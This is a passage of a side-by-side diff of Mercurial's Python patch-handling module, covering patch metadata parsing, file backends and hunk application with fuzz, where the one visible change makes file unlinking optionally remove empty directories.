289 prefix = '# %s ' % header
290 if line.startswith(prefix):
290 if line.startswith(prefix):
291 data[key] = line[len(prefix):]
291 data[key] = line[len(prefix):]
292 else:
292 else:
293 hgpatchheader = False
293 hgpatchheader = False
294 elif line == '---':
294 elif line == '---':
295 ignoretext = True
295 ignoretext = True
296 if not hgpatchheader and not ignoretext:
296 if not hgpatchheader and not ignoretext:
297 cfp.write(line)
297 cfp.write(line)
298 cfp.write('\n')
298 cfp.write('\n')
299 message = cfp.getvalue()
299 message = cfp.getvalue()
300 if tmpfp:
300 if tmpfp:
301 tmpfp.write(payload)
301 tmpfp.write(payload)
302 if not payload.endswith('\n'):
302 if not payload.endswith('\n'):
303 tmpfp.write('\n')
303 tmpfp.write('\n')
304 elif not diffs_seen and message and content_type == 'text/plain':
304 elif not diffs_seen and message and content_type == 'text/plain':
305 message += '\n' + payload
305 message += '\n' + payload
306
306
307 if subject and not message.startswith(subject):
307 if subject and not message.startswith(subject):
308 message = '%s\n%s' % (subject, message)
308 message = '%s\n%s' % (subject, message)
309 data['message'] = message
309 data['message'] = message
310 tmpfp.close()
310 tmpfp.close()
311 if parents:
311 if parents:
312 data['p1'] = parents.pop(0)
312 data['p1'] = parents.pop(0)
313 if parents:
313 if parents:
314 data['p2'] = parents.pop(0)
314 data['p2'] = parents.pop(0)
315
315
316 if diffs_seen:
316 if diffs_seen:
317 data['filename'] = tmpname
317 data['filename'] = tmpname
318
318
319 return data
319 return data
320
320
321 class patchmeta(object):
321 class patchmeta(object):
322 """Patched file metadata
322 """Patched file metadata
323
323
324 'op' is the performed operation within ADD, DELETE, RENAME, MODIFY
324 'op' is the performed operation within ADD, DELETE, RENAME, MODIFY
325 or COPY. 'path' is patched file path. 'oldpath' is set to the
325 or COPY. 'path' is patched file path. 'oldpath' is set to the
326 origin file when 'op' is either COPY or RENAME, None otherwise. If
326 origin file when 'op' is either COPY or RENAME, None otherwise. If
327 file mode is changed, 'mode' is a tuple (islink, isexec) where
327 file mode is changed, 'mode' is a tuple (islink, isexec) where
328 'islink' is True if the file is a symlink and 'isexec' is True if
328 'islink' is True if the file is a symlink and 'isexec' is True if
329 the file is executable. Otherwise, 'mode' is None.
329 the file is executable. Otherwise, 'mode' is None.
330 """
330 """
331 def __init__(self, path):
331 def __init__(self, path):
332 self.path = path
332 self.path = path
333 self.oldpath = None
333 self.oldpath = None
334 self.mode = None
334 self.mode = None
335 self.op = 'MODIFY'
335 self.op = 'MODIFY'
336 self.binary = False
336 self.binary = False
337
337
338 def setmode(self, mode):
338 def setmode(self, mode):
339 islink = mode & 0o20000
339 islink = mode & 0o20000
340 isexec = mode & 0o100
340 isexec = mode & 0o100
341 self.mode = (islink, isexec)
341 self.mode = (islink, isexec)
342
342
343 def copy(self):
343 def copy(self):
344 other = patchmeta(self.path)
344 other = patchmeta(self.path)
345 other.oldpath = self.oldpath
345 other.oldpath = self.oldpath
346 other.mode = self.mode
346 other.mode = self.mode
347 other.op = self.op
347 other.op = self.op
348 other.binary = self.binary
348 other.binary = self.binary
349 return other
349 return other
350
350
351 def _ispatchinga(self, afile):
351 def _ispatchinga(self, afile):
352 if afile == '/dev/null':
352 if afile == '/dev/null':
353 return self.op == 'ADD'
353 return self.op == 'ADD'
354 return afile == 'a/' + (self.oldpath or self.path)
354 return afile == 'a/' + (self.oldpath or self.path)
355
355
356 def _ispatchingb(self, bfile):
356 def _ispatchingb(self, bfile):
357 if bfile == '/dev/null':
357 if bfile == '/dev/null':
358 return self.op == 'DELETE'
358 return self.op == 'DELETE'
359 return bfile == 'b/' + self.path
359 return bfile == 'b/' + self.path
360
360
361 def ispatching(self, afile, bfile):
361 def ispatching(self, afile, bfile):
362 return self._ispatchinga(afile) and self._ispatchingb(bfile)
362 return self._ispatchinga(afile) and self._ispatchingb(bfile)
363
363
364 def __repr__(self):
364 def __repr__(self):
365 return "<patchmeta %s %r>" % (self.op, self.path)
365 return "<patchmeta %s %r>" % (self.op, self.path)
366
366
367 def readgitpatch(lr):
367 def readgitpatch(lr):
368 """extract git-style metadata about patches from <patchname>"""
368 """extract git-style metadata about patches from <patchname>"""
369
369
370 # Filter patch for git information
370 # Filter patch for git information
371 gp = None
371 gp = None
372 gitpatches = []
372 gitpatches = []
373 for line in lr:
373 for line in lr:
374 line = line.rstrip(' \r\n')
374 line = line.rstrip(' \r\n')
375 if line.startswith('diff --git a/'):
375 if line.startswith('diff --git a/'):
376 m = gitre.match(line)
376 m = gitre.match(line)
377 if m:
377 if m:
378 if gp:
378 if gp:
379 gitpatches.append(gp)
379 gitpatches.append(gp)
380 dst = m.group(2)
380 dst = m.group(2)
381 gp = patchmeta(dst)
381 gp = patchmeta(dst)
382 elif gp:
382 elif gp:
383 if line.startswith('--- '):
383 if line.startswith('--- '):
384 gitpatches.append(gp)
384 gitpatches.append(gp)
385 gp = None
385 gp = None
386 continue
386 continue
387 if line.startswith('rename from '):
387 if line.startswith('rename from '):
388 gp.op = 'RENAME'
388 gp.op = 'RENAME'
389 gp.oldpath = line[12:]
389 gp.oldpath = line[12:]
390 elif line.startswith('rename to '):
390 elif line.startswith('rename to '):
391 gp.path = line[10:]
391 gp.path = line[10:]
392 elif line.startswith('copy from '):
392 elif line.startswith('copy from '):
393 gp.op = 'COPY'
393 gp.op = 'COPY'
394 gp.oldpath = line[10:]
394 gp.oldpath = line[10:]
395 elif line.startswith('copy to '):
395 elif line.startswith('copy to '):
396 gp.path = line[8:]
396 gp.path = line[8:]
397 elif line.startswith('deleted file'):
397 elif line.startswith('deleted file'):
398 gp.op = 'DELETE'
398 gp.op = 'DELETE'
399 elif line.startswith('new file mode '):
399 elif line.startswith('new file mode '):
400 gp.op = 'ADD'
400 gp.op = 'ADD'
401 gp.setmode(int(line[-6:], 8))
401 gp.setmode(int(line[-6:], 8))
402 elif line.startswith('new mode '):
402 elif line.startswith('new mode '):
403 gp.setmode(int(line[-6:], 8))
403 gp.setmode(int(line[-6:], 8))
404 elif line.startswith('GIT binary patch'):
404 elif line.startswith('GIT binary patch'):
405 gp.binary = True
405 gp.binary = True
406 if gp:
406 if gp:
407 gitpatches.append(gp)
407 gitpatches.append(gp)
408
408
409 return gitpatches
409 return gitpatches
410
410
411 class linereader(object):
411 class linereader(object):
412 # simple class to allow pushing lines back into the input stream
412 # simple class to allow pushing lines back into the input stream
413 def __init__(self, fp):
413 def __init__(self, fp):
414 self.fp = fp
414 self.fp = fp
415 self.buf = []
415 self.buf = []
416
416
417 def push(self, line):
417 def push(self, line):
418 if line is not None:
418 if line is not None:
419 self.buf.append(line)
419 self.buf.append(line)
420
420
421 def readline(self):
421 def readline(self):
422 if self.buf:
422 if self.buf:
423 l = self.buf[0]
423 l = self.buf[0]
424 del self.buf[0]
424 del self.buf[0]
425 return l
425 return l
426 return self.fp.readline()
426 return self.fp.readline()
427
427
428 def __iter__(self):
428 def __iter__(self):
429 return iter(self.readline, '')
429 return iter(self.readline, '')
430
430
431 class abstractbackend(object):
431 class abstractbackend(object):
432 def __init__(self, ui):
432 def __init__(self, ui):
433 self.ui = ui
433 self.ui = ui
434
434
435 def getfile(self, fname):
435 def getfile(self, fname):
436 """Return target file data and flags as a (data, (islink,
436 """Return target file data and flags as a (data, (islink,
437 isexec)) tuple. Data is None if file is missing/deleted.
437 isexec)) tuple. Data is None if file is missing/deleted.
438 """
438 """
439 raise NotImplementedError
439 raise NotImplementedError
440
440
441 def setfile(self, fname, data, mode, copysource):
441 def setfile(self, fname, data, mode, copysource):
442 """Write data to target file fname and set its mode. mode is a
442 """Write data to target file fname and set its mode. mode is a
443 (islink, isexec) tuple. If data is None, the file content should
443 (islink, isexec) tuple. If data is None, the file content should
444 be left unchanged. If the file is modified after being copied,
444 be left unchanged. If the file is modified after being copied,
445 copysource is set to the original file name.
445 copysource is set to the original file name.
446 """
446 """
447 raise NotImplementedError
447 raise NotImplementedError
448
448
449 def unlink(self, fname):
449 def unlink(self, fname):
450 """Unlink target file."""
450 """Unlink target file."""
451 raise NotImplementedError
451 raise NotImplementedError
452
452
453 def writerej(self, fname, failed, total, lines):
453 def writerej(self, fname, failed, total, lines):
454 """Write rejected lines for fname. total is the number of hunks
454 """Write rejected lines for fname. total is the number of hunks
455 which failed to apply and total the total number of hunks for this
455 which failed to apply and total the total number of hunks for this
456 files.
456 files.
457 """
457 """
458
458
459 def exists(self, fname):
459 def exists(self, fname):
460 raise NotImplementedError
460 raise NotImplementedError
461
461
462 def close(self):
462 def close(self):
463 raise NotImplementedError
463 raise NotImplementedError
464
464
465 class fsbackend(abstractbackend):
465 class fsbackend(abstractbackend):
466 def __init__(self, ui, basedir):
466 def __init__(self, ui, basedir):
467 super(fsbackend, self).__init__(ui)
467 super(fsbackend, self).__init__(ui)
468 self.opener = vfsmod.vfs(basedir)
468 self.opener = vfsmod.vfs(basedir)
469
469
470 def getfile(self, fname):
470 def getfile(self, fname):
471 if self.opener.islink(fname):
471 if self.opener.islink(fname):
472 return (self.opener.readlink(fname), (True, False))
472 return (self.opener.readlink(fname), (True, False))
473
473
474 isexec = False
474 isexec = False
475 try:
475 try:
476 isexec = self.opener.lstat(fname).st_mode & 0o100 != 0
476 isexec = self.opener.lstat(fname).st_mode & 0o100 != 0
477 except OSError as e:
477 except OSError as e:
478 if e.errno != errno.ENOENT:
478 if e.errno != errno.ENOENT:
479 raise
479 raise
480 try:
480 try:
481 return (self.opener.read(fname), (False, isexec))
481 return (self.opener.read(fname), (False, isexec))
482 except IOError as e:
482 except IOError as e:
483 if e.errno != errno.ENOENT:
483 if e.errno != errno.ENOENT:
484 raise
484 raise
485 return None, None
485 return None, None
486
486
487 def setfile(self, fname, data, mode, copysource):
487 def setfile(self, fname, data, mode, copysource):
488 islink, isexec = mode
488 islink, isexec = mode
489 if data is None:
489 if data is None:
490 self.opener.setflags(fname, islink, isexec)
490 self.opener.setflags(fname, islink, isexec)
491 return
491 return
492 if islink:
492 if islink:
493 self.opener.symlink(data, fname)
493 self.opener.symlink(data, fname)
494 else:
494 else:
495 self.opener.write(fname, data)
495 self.opener.write(fname, data)
496 if isexec:
496 if isexec:
497 self.opener.setflags(fname, False, True)
497 self.opener.setflags(fname, False, True)
498
498
499 def unlink(self, fname):
499 def unlink(self, fname):
500 self.opener.unlinkpath(fname, ignoremissing=True)
500 rmdir = self.ui.configbool('experimental', 'removeemptydirs')
501 self.opener.unlinkpath(fname, ignoremissing=True, rmdir=rmdir)
501
502
502 def writerej(self, fname, failed, total, lines):
503 def writerej(self, fname, failed, total, lines):
503 fname = fname + ".rej"
504 fname = fname + ".rej"
504 self.ui.warn(
505 self.ui.warn(
505 _("%d out of %d hunks FAILED -- saving rejects to file %s\n") %
506 _("%d out of %d hunks FAILED -- saving rejects to file %s\n") %
506 (failed, total, fname))
507 (failed, total, fname))
507 fp = self.opener(fname, 'w')
508 fp = self.opener(fname, 'w')
508 fp.writelines(lines)
509 fp.writelines(lines)
509 fp.close()
510 fp.close()
510
511
511 def exists(self, fname):
512 def exists(self, fname):
512 return self.opener.lexists(fname)
513 return self.opener.lexists(fname)
513
514
514 class workingbackend(fsbackend):
515 class workingbackend(fsbackend):
515 def __init__(self, ui, repo, similarity):
516 def __init__(self, ui, repo, similarity):
516 super(workingbackend, self).__init__(ui, repo.root)
517 super(workingbackend, self).__init__(ui, repo.root)
517 self.repo = repo
518 self.repo = repo
518 self.similarity = similarity
519 self.similarity = similarity
519 self.removed = set()
520 self.removed = set()
520 self.changed = set()
521 self.changed = set()
521 self.copied = []
522 self.copied = []
522
523
523 def _checkknown(self, fname):
524 def _checkknown(self, fname):
524 if self.repo.dirstate[fname] == '?' and self.exists(fname):
525 if self.repo.dirstate[fname] == '?' and self.exists(fname):
525 raise PatchError(_('cannot patch %s: file is not tracked') % fname)
526 raise PatchError(_('cannot patch %s: file is not tracked') % fname)
526
527
527 def setfile(self, fname, data, mode, copysource):
528 def setfile(self, fname, data, mode, copysource):
528 self._checkknown(fname)
529 self._checkknown(fname)
529 super(workingbackend, self).setfile(fname, data, mode, copysource)
530 super(workingbackend, self).setfile(fname, data, mode, copysource)
530 if copysource is not None:
531 if copysource is not None:
531 self.copied.append((copysource, fname))
532 self.copied.append((copysource, fname))
532 self.changed.add(fname)
533 self.changed.add(fname)
533
534
534 def unlink(self, fname):
535 def unlink(self, fname):
535 self._checkknown(fname)
536 self._checkknown(fname)
536 super(workingbackend, self).unlink(fname)
537 super(workingbackend, self).unlink(fname)
537 self.removed.add(fname)
538 self.removed.add(fname)
538 self.changed.add(fname)
539 self.changed.add(fname)
539
540
540 def close(self):
541 def close(self):
541 wctx = self.repo[None]
542 wctx = self.repo[None]
542 changed = set(self.changed)
543 changed = set(self.changed)
543 for src, dst in self.copied:
544 for src, dst in self.copied:
544 scmutil.dirstatecopy(self.ui, self.repo, wctx, src, dst)
545 scmutil.dirstatecopy(self.ui, self.repo, wctx, src, dst)
545 if self.removed:
546 if self.removed:
546 wctx.forget(sorted(self.removed))
547 wctx.forget(sorted(self.removed))
547 for f in self.removed:
548 for f in self.removed:
548 if f not in self.repo.dirstate:
549 if f not in self.repo.dirstate:
549 # File was deleted and no longer belongs to the
550 # File was deleted and no longer belongs to the
550 # dirstate, it was probably marked added then
551 # dirstate, it was probably marked added then
551 # deleted, and should not be considered by
552 # deleted, and should not be considered by
552 # marktouched().
553 # marktouched().
553 changed.discard(f)
554 changed.discard(f)
554 if changed:
555 if changed:
555 scmutil.marktouched(self.repo, changed, self.similarity)
556 scmutil.marktouched(self.repo, changed, self.similarity)
556 return sorted(self.changed)
557 return sorted(self.changed)
557
558
558 class filestore(object):
559 class filestore(object):
559 def __init__(self, maxsize=None):
560 def __init__(self, maxsize=None):
560 self.opener = None
561 self.opener = None
561 self.files = {}
562 self.files = {}
562 self.created = 0
563 self.created = 0
563 self.maxsize = maxsize
564 self.maxsize = maxsize
564 if self.maxsize is None:
565 if self.maxsize is None:
565 self.maxsize = 4*(2**20)
566 self.maxsize = 4*(2**20)
566 self.size = 0
567 self.size = 0
567 self.data = {}
568 self.data = {}
568
569
569 def setfile(self, fname, data, mode, copied=None):
570 def setfile(self, fname, data, mode, copied=None):
570 if self.maxsize < 0 or (len(data) + self.size) <= self.maxsize:
571 if self.maxsize < 0 or (len(data) + self.size) <= self.maxsize:
571 self.data[fname] = (data, mode, copied)
572 self.data[fname] = (data, mode, copied)
572 self.size += len(data)
573 self.size += len(data)
573 else:
574 else:
574 if self.opener is None:
575 if self.opener is None:
575 root = pycompat.mkdtemp(prefix='hg-patch-')
576 root = pycompat.mkdtemp(prefix='hg-patch-')
576 self.opener = vfsmod.vfs(root)
577 self.opener = vfsmod.vfs(root)
577 # Avoid filename issues with these simple names
578 # Avoid filename issues with these simple names
578 fn = '%d' % self.created
579 fn = '%d' % self.created
579 self.opener.write(fn, data)
580 self.opener.write(fn, data)
580 self.created += 1
581 self.created += 1
581 self.files[fname] = (fn, mode, copied)
582 self.files[fname] = (fn, mode, copied)
582
583
583 def getfile(self, fname):
584 def getfile(self, fname):
584 if fname in self.data:
585 if fname in self.data:
585 return self.data[fname]
586 return self.data[fname]
586 if not self.opener or fname not in self.files:
587 if not self.opener or fname not in self.files:
587 return None, None, None
588 return None, None, None
588 fn, mode, copied = self.files[fname]
589 fn, mode, copied = self.files[fname]
589 return self.opener.read(fn), mode, copied
590 return self.opener.read(fn), mode, copied
590
591
591 def close(self):
592 def close(self):
592 if self.opener:
593 if self.opener:
593 shutil.rmtree(self.opener.base)
594 shutil.rmtree(self.opener.base)
594
595
595 class repobackend(abstractbackend):
596 class repobackend(abstractbackend):
596 def __init__(self, ui, repo, ctx, store):
597 def __init__(self, ui, repo, ctx, store):
597 super(repobackend, self).__init__(ui)
598 super(repobackend, self).__init__(ui)
598 self.repo = repo
599 self.repo = repo
599 self.ctx = ctx
600 self.ctx = ctx
600 self.store = store
601 self.store = store
601 self.changed = set()
602 self.changed = set()
602 self.removed = set()
603 self.removed = set()
603 self.copied = {}
604 self.copied = {}
604
605
605 def _checkknown(self, fname):
606 def _checkknown(self, fname):
606 if fname not in self.ctx:
607 if fname not in self.ctx:
607 raise PatchError(_('cannot patch %s: file is not tracked') % fname)
608 raise PatchError(_('cannot patch %s: file is not tracked') % fname)
608
609
609 def getfile(self, fname):
610 def getfile(self, fname):
610 try:
611 try:
611 fctx = self.ctx[fname]
612 fctx = self.ctx[fname]
612 except error.LookupError:
613 except error.LookupError:
613 return None, None
614 return None, None
614 flags = fctx.flags()
615 flags = fctx.flags()
615 return fctx.data(), ('l' in flags, 'x' in flags)
616 return fctx.data(), ('l' in flags, 'x' in flags)
616
617
617 def setfile(self, fname, data, mode, copysource):
618 def setfile(self, fname, data, mode, copysource):
618 if copysource:
619 if copysource:
619 self._checkknown(copysource)
620 self._checkknown(copysource)
620 if data is None:
621 if data is None:
621 data = self.ctx[fname].data()
622 data = self.ctx[fname].data()
622 self.store.setfile(fname, data, mode, copysource)
623 self.store.setfile(fname, data, mode, copysource)
623 self.changed.add(fname)
624 self.changed.add(fname)
624 if copysource:
625 if copysource:
625 self.copied[fname] = copysource
626 self.copied[fname] = copysource
626
627
627 def unlink(self, fname):
628 def unlink(self, fname):
628 self._checkknown(fname)
629 self._checkknown(fname)
629 self.removed.add(fname)
630 self.removed.add(fname)
630
631
631 def exists(self, fname):
632 def exists(self, fname):
632 return fname in self.ctx
633 return fname in self.ctx
633
634
634 def close(self):
635 def close(self):
635 return self.changed | self.removed
636 return self.changed | self.removed
636
637
637 # @@ -start,len +start,len @@ or @@ -start +start @@ if len is 1
638 # @@ -start,len +start,len @@ or @@ -start +start @@ if len is 1
638 unidesc = re.compile('@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))? @@')
639 unidesc = re.compile('@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))? @@')
639 contextdesc = re.compile('(?:---|\*\*\*) (\d+)(?:,(\d+))? (?:---|\*\*\*)')
640 contextdesc = re.compile('(?:---|\*\*\*) (\d+)(?:,(\d+))? (?:---|\*\*\*)')
640 eolmodes = ['strict', 'crlf', 'lf', 'auto']
641 eolmodes = ['strict', 'crlf', 'lf', 'auto']
641
642
642 class patchfile(object):
643 class patchfile(object):
643 def __init__(self, ui, gp, backend, store, eolmode='strict'):
644 def __init__(self, ui, gp, backend, store, eolmode='strict'):
644 self.fname = gp.path
645 self.fname = gp.path
645 self.eolmode = eolmode
646 self.eolmode = eolmode
646 self.eol = None
647 self.eol = None
647 self.backend = backend
648 self.backend = backend
648 self.ui = ui
649 self.ui = ui
649 self.lines = []
650 self.lines = []
650 self.exists = False
651 self.exists = False
651 self.missing = True
652 self.missing = True
652 self.mode = gp.mode
653 self.mode = gp.mode
653 self.copysource = gp.oldpath
654 self.copysource = gp.oldpath
654 self.create = gp.op in ('ADD', 'COPY', 'RENAME')
655 self.create = gp.op in ('ADD', 'COPY', 'RENAME')
655 self.remove = gp.op == 'DELETE'
656 self.remove = gp.op == 'DELETE'
656 if self.copysource is None:
657 if self.copysource is None:
657 data, mode = backend.getfile(self.fname)
658 data, mode = backend.getfile(self.fname)
658 else:
659 else:
659 data, mode = store.getfile(self.copysource)[:2]
660 data, mode = store.getfile(self.copysource)[:2]
660 if data is not None:
661 if data is not None:
661 self.exists = self.copysource is None or backend.exists(self.fname)
662 self.exists = self.copysource is None or backend.exists(self.fname)
662 self.missing = False
663 self.missing = False
663 if data:
664 if data:
664 self.lines = mdiff.splitnewlines(data)
665 self.lines = mdiff.splitnewlines(data)
665 if self.mode is None:
666 if self.mode is None:
666 self.mode = mode
667 self.mode = mode
667 if self.lines:
668 if self.lines:
668 # Normalize line endings
669 # Normalize line endings
669 if self.lines[0].endswith('\r\n'):
670 if self.lines[0].endswith('\r\n'):
670 self.eol = '\r\n'
671 self.eol = '\r\n'
671 elif self.lines[0].endswith('\n'):
672 elif self.lines[0].endswith('\n'):
672 self.eol = '\n'
673 self.eol = '\n'
673 if eolmode != 'strict':
674 if eolmode != 'strict':
674 nlines = []
675 nlines = []
675 for l in self.lines:
676 for l in self.lines:
676 if l.endswith('\r\n'):
677 if l.endswith('\r\n'):
677 l = l[:-2] + '\n'
678 l = l[:-2] + '\n'
678 nlines.append(l)
679 nlines.append(l)
679 self.lines = nlines
680 self.lines = nlines
680 else:
681 else:
681 if self.create:
682 if self.create:
682 self.missing = False
683 self.missing = False
683 if self.mode is None:
684 if self.mode is None:
684 self.mode = (False, False)
685 self.mode = (False, False)
685 if self.missing:
686 if self.missing:
686 self.ui.warn(_("unable to find '%s' for patching\n") % self.fname)
687 self.ui.warn(_("unable to find '%s' for patching\n") % self.fname)
687 self.ui.warn(_("(use '--prefix' to apply patch relative to the "
688 self.ui.warn(_("(use '--prefix' to apply patch relative to the "
688 "current directory)\n"))
689 "current directory)\n"))
689
690
690 self.hash = {}
691 self.hash = {}
691 self.dirty = 0
692 self.dirty = 0
692 self.offset = 0
693 self.offset = 0
693 self.skew = 0
694 self.skew = 0
694 self.rej = []
695 self.rej = []
695 self.fileprinted = False
696 self.fileprinted = False
696 self.printfile(False)
697 self.printfile(False)
697 self.hunks = 0
698 self.hunks = 0
698
699
699 def writelines(self, fname, lines, mode):
700 def writelines(self, fname, lines, mode):
700 if self.eolmode == 'auto':
701 if self.eolmode == 'auto':
701 eol = self.eol
702 eol = self.eol
702 elif self.eolmode == 'crlf':
703 elif self.eolmode == 'crlf':
703 eol = '\r\n'
704 eol = '\r\n'
704 else:
705 else:
705 eol = '\n'
706 eol = '\n'
706
707
707 if self.eolmode != 'strict' and eol and eol != '\n':
708 if self.eolmode != 'strict' and eol and eol != '\n':
708 rawlines = []
709 rawlines = []
709 for l in lines:
710 for l in lines:
710 if l and l.endswith('\n'):
711 if l and l.endswith('\n'):
711 l = l[:-1] + eol
712 l = l[:-1] + eol
712 rawlines.append(l)
713 rawlines.append(l)
713 lines = rawlines
714 lines = rawlines
714
715
715 self.backend.setfile(fname, ''.join(lines), mode, self.copysource)
716 self.backend.setfile(fname, ''.join(lines), mode, self.copysource)
716
717
717 def printfile(self, warn):
718 def printfile(self, warn):
718 if self.fileprinted:
719 if self.fileprinted:
719 return
720 return
720 if warn or self.ui.verbose:
721 if warn or self.ui.verbose:
721 self.fileprinted = True
722 self.fileprinted = True
722 s = _("patching file %s\n") % self.fname
723 s = _("patching file %s\n") % self.fname
723 if warn:
724 if warn:
724 self.ui.warn(s)
725 self.ui.warn(s)
725 else:
726 else:
726 self.ui.note(s)
727 self.ui.note(s)
727
728
728
729
729 def findlines(self, l, linenum):
730 def findlines(self, l, linenum):
730 # looks through the hash and finds candidate lines. The
731 # looks through the hash and finds candidate lines. The
731 # result is a list of line numbers sorted based on distance
732 # result is a list of line numbers sorted based on distance
732 # from linenum
733 # from linenum
733
734
734 cand = self.hash.get(l, [])
735 cand = self.hash.get(l, [])
735 if len(cand) > 1:
736 if len(cand) > 1:
736 # resort our list of potentials forward then back.
737 # resort our list of potentials forward then back.
737 cand.sort(key=lambda x: abs(x - linenum))
738 cand.sort(key=lambda x: abs(x - linenum))
738 return cand
739 return cand
739
740
740 def write_rej(self):
741 def write_rej(self):
741 # our rejects are a little different from patch(1). This always
742 # our rejects are a little different from patch(1). This always
742 # creates rejects in the same form as the original patch. A file
743 # creates rejects in the same form as the original patch. A file
743 # header is inserted so that you can run the reject through patch again
744 # header is inserted so that you can run the reject through patch again
744 # without having to type the filename.
745 # without having to type the filename.
745 if not self.rej:
746 if not self.rej:
746 return
747 return
747 base = os.path.basename(self.fname)
748 base = os.path.basename(self.fname)
748 lines = ["--- %s\n+++ %s\n" % (base, base)]
749 lines = ["--- %s\n+++ %s\n" % (base, base)]
749 for x in self.rej:
750 for x in self.rej:
750 for l in x.hunk:
751 for l in x.hunk:
751 lines.append(l)
752 lines.append(l)
752 if l[-1:] != '\n':
753 if l[-1:] != '\n':
753 lines.append("\n\ No newline at end of file\n")
754 lines.append("\n\ No newline at end of file\n")
754 self.backend.writerej(self.fname, len(self.rej), self.hunks, lines)
755 self.backend.writerej(self.fname, len(self.rej), self.hunks, lines)
755
756
756 def apply(self, h):
757 def apply(self, h):
757 if not h.complete():
758 if not h.complete():
758 raise PatchError(_("bad hunk #%d %s (%d %d %d %d)") %
759 raise PatchError(_("bad hunk #%d %s (%d %d %d %d)") %
759 (h.number, h.desc, len(h.a), h.lena, len(h.b),
760 (h.number, h.desc, len(h.a), h.lena, len(h.b),
760 h.lenb))
761 h.lenb))
761
762
762 self.hunks += 1
763 self.hunks += 1
763
764
764 if self.missing:
765 if self.missing:
765 self.rej.append(h)
766 self.rej.append(h)
766 return -1
767 return -1
767
768
768 if self.exists and self.create:
769 if self.exists and self.create:
769 if self.copysource:
770 if self.copysource:
770 self.ui.warn(_("cannot create %s: destination already "
771 self.ui.warn(_("cannot create %s: destination already "
771 "exists\n") % self.fname)
772 "exists\n") % self.fname)
772 else:
773 else:
773 self.ui.warn(_("file %s already exists\n") % self.fname)
774 self.ui.warn(_("file %s already exists\n") % self.fname)
774 self.rej.append(h)
775 self.rej.append(h)
775 return -1
776 return -1
776
777
777 if isinstance(h, binhunk):
778 if isinstance(h, binhunk):
778 if self.remove:
779 if self.remove:
779 self.backend.unlink(self.fname)
780 self.backend.unlink(self.fname)
780 else:
781 else:
781 l = h.new(self.lines)
782 l = h.new(self.lines)
782 self.lines[:] = l
783 self.lines[:] = l
783 self.offset += len(l)
784 self.offset += len(l)
784 self.dirty = True
785 self.dirty = True
785 return 0
786 return 0
786
787
787 horig = h
788 horig = h
788 if (self.eolmode in ('crlf', 'lf')
789 if (self.eolmode in ('crlf', 'lf')
789 or self.eolmode == 'auto' and self.eol):
790 or self.eolmode == 'auto' and self.eol):
790 # If new eols are going to be normalized, then normalize
791 # If new eols are going to be normalized, then normalize
791 # hunk data before patching. Otherwise, preserve input
792 # hunk data before patching. Otherwise, preserve input
792 # line-endings.
793 # line-endings.
793 h = h.getnormalized()
794 h = h.getnormalized()
794
795
795 # fast case first, no offsets, no fuzz
796 # fast case first, no offsets, no fuzz
796 old, oldstart, new, newstart = h.fuzzit(0, False)
797 old, oldstart, new, newstart = h.fuzzit(0, False)
797 oldstart += self.offset
798 oldstart += self.offset
798 orig_start = oldstart
799 orig_start = oldstart
799 # if there's skew we want to emit the "(offset %d lines)" even
800 # if there's skew we want to emit the "(offset %d lines)" even
800 # when the hunk cleanly applies at start + skew, so skip the
801 # when the hunk cleanly applies at start + skew, so skip the
801 # fast case code
802 # fast case code
802 if self.skew == 0 and diffhelper.testhunk(old, self.lines, oldstart):
803 if self.skew == 0 and diffhelper.testhunk(old, self.lines, oldstart):
803 if self.remove:
804 if self.remove:
804 self.backend.unlink(self.fname)
805 self.backend.unlink(self.fname)
805 else:
806 else:
806 self.lines[oldstart:oldstart + len(old)] = new
807 self.lines[oldstart:oldstart + len(old)] = new
807 self.offset += len(new) - len(old)
808 self.offset += len(new) - len(old)
808 self.dirty = True
809 self.dirty = True
809 return 0
810 return 0
810
811
811 # ok, we couldn't match the hunk. Lets look for offsets and fuzz it
812 # ok, we couldn't match the hunk. Lets look for offsets and fuzz it
812 self.hash = {}
813 self.hash = {}
813 for x, s in enumerate(self.lines):
814 for x, s in enumerate(self.lines):
814 self.hash.setdefault(s, []).append(x)
815 self.hash.setdefault(s, []).append(x)
815
816
816 for fuzzlen in xrange(self.ui.configint("patch", "fuzz") + 1):
817 for fuzzlen in xrange(self.ui.configint("patch", "fuzz") + 1):
817 for toponly in [True, False]:
818 for toponly in [True, False]:
818 old, oldstart, new, newstart = h.fuzzit(fuzzlen, toponly)
819 old, oldstart, new, newstart = h.fuzzit(fuzzlen, toponly)
819 oldstart = oldstart + self.offset + self.skew
820 oldstart = oldstart + self.offset + self.skew
820 oldstart = min(oldstart, len(self.lines))
821 oldstart = min(oldstart, len(self.lines))
821 if old:
822 if old:
822 cand = self.findlines(old[0][1:], oldstart)
823 cand = self.findlines(old[0][1:], oldstart)
823 else:
824 else:
824 # Only adding lines with no or fuzzed context, just
825 # Only adding lines with no or fuzzed context, just
825 # take the skew in account
826 # take the skew in account
826 cand = [oldstart]
827 cand = [oldstart]
827
828
828 for l in cand:
829 for l in cand:
829 if not old or diffhelper.testhunk(old, self.lines, l):
830 if not old or diffhelper.testhunk(old, self.lines, l):
830 self.lines[l : l + len(old)] = new
831 self.lines[l : l + len(old)] = new
831 self.offset += len(new) - len(old)
832 self.offset += len(new) - len(old)
832 self.skew = l - orig_start
833 self.skew = l - orig_start
833 self.dirty = True
834 self.dirty = True
834 offset = l - orig_start - fuzzlen
835 offset = l - orig_start - fuzzlen
835 if fuzzlen:
836 if fuzzlen:
836 msg = _("Hunk #%d succeeded at %d "
837 msg = _("Hunk #%d succeeded at %d "
837 "with fuzz %d "
838 "with fuzz %d "
838 "(offset %d lines).\n")
839 "(offset %d lines).\n")
839 self.printfile(True)
840 self.printfile(True)
840 self.ui.warn(msg %
841 self.ui.warn(msg %
841 (h.number, l + 1, fuzzlen, offset))
842 (h.number, l + 1, fuzzlen, offset))
842 else:
843 else:
843 msg = _("Hunk #%d succeeded at %d "
844 msg = _("Hunk #%d succeeded at %d "
844 "(offset %d lines).\n")
845 "(offset %d lines).\n")
845 self.ui.note(msg % (h.number, l + 1, offset))
846 self.ui.note(msg % (h.number, l + 1, offset))
846 return fuzzlen
847 return fuzzlen
847 self.printfile(True)
848 self.printfile(True)
848 self.ui.warn(_("Hunk #%d FAILED at %d\n") % (h.number, orig_start))
849 self.ui.warn(_("Hunk #%d FAILED at %d\n") % (h.number, orig_start))
849 self.rej.append(horig)
850 self.rej.append(horig)
850 return -1
851 return -1
851
852
852 def close(self):
853 def close(self):
853 if self.dirty:
854 if self.dirty:
854 self.writelines(self.fname, self.lines, self.mode)
